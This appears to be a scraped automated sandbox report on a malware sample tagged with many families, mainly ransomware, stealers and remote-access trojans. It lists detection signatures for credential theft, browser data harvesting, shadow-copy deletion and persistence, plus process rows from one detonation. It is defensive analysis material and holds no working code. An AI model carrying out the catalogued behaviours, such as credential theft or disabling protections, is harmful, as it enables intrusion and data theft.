Malware Analysis Report

2025-05-28 17:08

Sample ID 250504-ft3ntsdq2z
Target 250504-fp27haxxd1.bin
SHA256 d91912b4b945e88e881e54573390e6723cfc41916b6546453b59e60f9beee337
Tags
hakbit credential_access defense_evasion discovery execution ransomware spyware stealer smokeloader backdoor persistence trojan djvu azorult rms aspackv2 infostealer lateral_movement privilege_escalation rat upx 305419896 main 26.02.2020 xdsddd victime 25/03 samay cryptone packer 09/04 07/04 insert-coin yt system hacked hack modiloader cobaltstrike njrat revengerat zloader zeppelin xred agenttesla danabot formbook gozi 86920224 app w9z agilenet banker botnet impact keylogger rezer0 rm3 googleaktualizacija googleaktualizacija1 asyncrat babylonrat darkcomet warzonerat 2020nov1 null emotet epoch2 tenakt
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d91912b4b945e88e881e54573390e6723cfc41916b6546453b59e60f9beee337

Threat Level: Known bad

The file 250504-fp27haxxd1.bin was found to be: Known bad.

Malicious Activity Summary

hakbit credential_access defense_evasion discovery execution ransomware spyware stealer smokeloader backdoor persistence trojan djvu azorult rms aspackv2 infostealer lateral_movement privilege_escalation rat upx 305419896 main 26.02.2020 xdsddd victime 25/03 samay cryptone packer 09/04 07/04 insert-coin yt system hacked hack modiloader cobaltstrike njrat revengerat zloader zeppelin xred agenttesla danabot formbook gozi 86920224 app w9z agilenet banker botnet impact keylogger rezer0 rm3 googleaktualizacija googleaktualizacija1 asyncrat babylonrat darkcomet warzonerat 2020nov1 null emotet epoch2 tenakt

Modiloader family

Modifies WinLogon for persistence

Zloader, Terdot, DELoader, ZeusSphinx

Cobaltstrike family

Zloader family

Warzonerat family

Emotet

AsyncRat

Asyncrat family

Djvu Ransomware

Gozi family

Formbook

Darkcomet family

njRAT/Bladabindi

Gozi

Azorult family

Modifies visiblity of hidden/system files in Explorer

UAC bypass

Danabot family

Djvu family

Danabot x86 payload

Agenttesla family

Darkcomet

Smokeloader family

Xred family

RevengeRAT

Emotet family

Hakbit family

Revengerat family

Hakbit

Detects Zeppelin payload

Rms family

Detected Djvu ransomware

Njrat family

ModiLoader Second Stage

Modifies Windows Defender Real-time Protection settings

Babylonrat family

Babylon RAT

SmokeLoader

RMS

Zeppelin family

WarzoneRat, AveMaria

Formbook family

Disables service(s)

Azorult

Danabot

Windows security bypass

AgentTesla

RevengeRat Executable

Emotet payload

Looks for VirtualBox Guest Additions in registry

CryptOne packer

ReZer0 packer

Warzone RAT payload

AgentTesla payload

Async RAT payload

Deletes shadow copies

Grants admin privileges

Formbook payload

RevengeRat Executable

Renames multiple (144) files with added filename extension

Remote Service Session Hijacking: RDP Hijacking

Blocks application from running via registry modification

Blocklisted process makes network request

Stops running service(s)

Sets file to hidden

Disables Task Manager via registry modification

Downloads MZ/PE file

Modifies Windows Firewall

Disables RegEdit via registry modification

Looks for VMWare Tools registry key

Drops file in Drivers directory

Server Software Component: Terminal Services DLL

Reads user/profile data of web browsers

Loads dropped DLL

Drops startup file

Obfuscated with Agile.Net obfuscator

ACProtect 1.3x - 1.4x DLL software

Checks computer location settings

Executes dropped EXE

Checks BIOS information in registry

Checks QEMU agent file

Credentials from Password Stores: Windows Credential Manager

Modifies file permissions

ASPack v2.12-2.42

Uses the VBS compiler for execution

Looks up external IP address via web service

Maps connected drives based on registry

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Adds Run key to start application

Checks for any installed AV software in registry

Command and Scripting Interpreter: PowerShell

Password Policy Discovery

Drops desktop.ini file(s)

Modifies WinLogon

AutoIT Executable

Drops file in System32 directory

Suspicious use of SetThreadContext

Hide Artifacts: Hidden Users

Suspicious use of NtSetInformationThreadHideFromDebugger

UPX packed file

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Program crash

System Location Discovery: System Language Discovery

Permission Groups Discovery: Local Groups

NSIS installer

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Modifies registry class

Views/modifies file attributes

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Runs net.exe

Checks SCSI registry key(s)

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Runs .reg file with regedit

Suspicious use of SetWindowsHookEx

Opens file in notepad (likely ransom note)

Gathers network information

System policy modification

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Runs ping.exe

Interacts with shadow copies

Suspicious behavior: RenamesItself

Suspicious behavior: SetClipboardViewer

Delays execution with timeout.exe

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-05-04 05:12

Signatures

Cobaltstrike family

cobaltstrike

Detects Zeppelin payload

Description Indicator Process Target
N/A N/A N/A N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modiloader family

modiloader

Njrat family

njrat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Revengerat family

revengerat

Xred family

xred

Zeppelin family

zeppelin

Zloader family

zloader

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral12

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

97s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"

Signatures

Disables service(s)

defense_evasion execution

Hakbit

ransomware hakbit

Hakbit family

hakbit

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Reads user/profile data of web browsers

spyware stealer

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5868 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
